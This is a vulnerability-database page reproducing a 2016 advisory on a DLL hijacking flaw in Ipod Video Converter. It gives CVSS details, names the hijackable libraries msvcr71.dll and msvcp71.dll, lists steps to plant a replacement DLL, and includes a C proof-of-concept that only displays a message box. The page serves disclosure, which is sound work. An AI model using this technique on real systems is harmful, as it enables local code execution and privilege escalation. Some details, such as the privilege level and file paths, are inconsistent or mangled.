Exploitalert - Database of Exploits

Ipod Video Converter - DLL Hijacking Vulnerability

CVE	Category	Price	Severity
N/A	CWE-426	N/A	High

Author	Risk	Exploitation Type	Date
N/A	High	Local	2016-09-27

CPE
cpe:cpe:/a:ipod-video-converter-dll:1.0

CVSS	EPSS	EPSSP
CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Local	AV	The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity	High	AC	The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required	High	PR	The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
Scope		S	An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2016090199

Ipod Video Converter - DLL Hijacking VulnerabilityDocument Title: =============== Ipod Video Converter - DLL Hijacking Vulnerability Release Date: ============= 2016-09-23 Vulnerability Disclosure Timeline: ================================== 2016-09-27 : Public Disclosure Product & Service Introduction: =============================== iPod Video Converter is a free and powerful iPod video and movie converter software which provides an easy way to convert any movie to iPod video. iPod Video Converter helps you watch music video and movies on your video iPod with only a few clicks.iPod Video Converter is compatible with the latest iPod Touch and with the iPhone. (Copy of the Vendor Homepage: http://www.reganam.com/ ) Affected Product(s): ==================== Reganam Interactive Product: Ipod Video Converter - Software Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local dll injection vulnerability has been discovered in the official Ipod Video Converter software. The issue allows local attackers to inject code to vulnerable libraries to compromise the process or to gain higher access privileges. Vulnerable Software: [+] Ipod Video Converter Vulnerable Libraries: [+] msvcr71.dll [+] msvcp71.dll Proof of Concept (PoC): ======================= The dll hijack vulnerability can be exploited by local attackers with restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the local vulnerability ... 1. Compile dll and rename to msvcr71.dll or msvcp71.dll 2. Copy wmsvcr71.dll or msvcp71.dll to C:Program Filesipodconverter2012ipod-converter.exe 3. Launch ipod-converter.exe 4. MessageBox Executed -- PoC Exploit -- #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "DLL Hijacking By ZwX!", "DLL Message", MB_OK); return 0; } [+] Disclaimer [+] =================== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Domain: www.zwx.fr Contact: [email protected] Social: twitter.com/XSSed.fr Feeds: www.zwx.fr/feed/ Advisory: www.vulnerability-lab.com/show.php?user=ZwX packetstormsecurity.com/files/author/12026/ cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/ 0day.today/author/27461 Copyright 2016 | ZwX - Security Researcher (Software & web application)

Impressum